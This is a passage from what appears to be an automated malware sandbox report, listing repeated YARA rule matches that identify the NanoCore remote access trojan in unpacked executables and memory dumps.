Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.3.ihgsvw.exe.1861890.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 10.2.RegSvcs.exe.6200000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 10.2.RegSvcs.exe.2c68c18.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.3.ihgsvw.exe.1861890.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.3.ihgsvw.exe.1929698.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 33.3.ihgsvw.exe.f38910.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 17.3.ihgsvw.exe.19926a8.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 22.2.RegSvcs.exe.3c307ce.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 35.3.ihgsvw.exe.17a7628.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 33.3.ihgsvw.exe.f38910.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.3.ihgsvw.exe.17f8880.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 29.3.ihgsvw.exe.133eea0.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
